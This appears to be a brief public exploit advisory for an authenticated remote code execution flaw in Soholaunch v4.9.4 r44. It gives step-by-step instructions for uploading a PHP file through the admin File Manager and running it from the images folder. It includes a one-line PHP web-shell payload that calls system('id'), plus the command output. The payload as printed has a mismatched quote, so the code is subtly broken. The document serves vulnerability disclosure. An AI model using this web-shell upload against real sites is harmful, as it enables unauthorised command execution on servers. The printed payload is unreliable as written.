Soholaunch version 4.9.4 r44 suffers from a remote shell upload vulnerability.
38cf97e11373ce1137705690e0184e70046c7384264c09e97f32c832e3026b02
## Exploit Title: Soholaunch Version : v4.9.4 r44 Remote Code Execution
### Date: 2024-3-29
### Exploit Author: tmrswrr
### Category: Webapps
### Vendor Homepage: https://www.soholaunch.com/
### Version : v4.9.4 r44
1 ) Login with admin cred click Main Menu > File Manager > Upload New Files > Uploading test.php file
Payload : <?php echo system('id); ?>
2 ) After click File Manager > Images > test.php : https://127.0.0.1/Soholaunch/images/test.php
Result: uid=1000(soho) gid=1000(soho) groups=1000(soho) uid=1000(soho) gid=1000(soho) groups=1000(soho)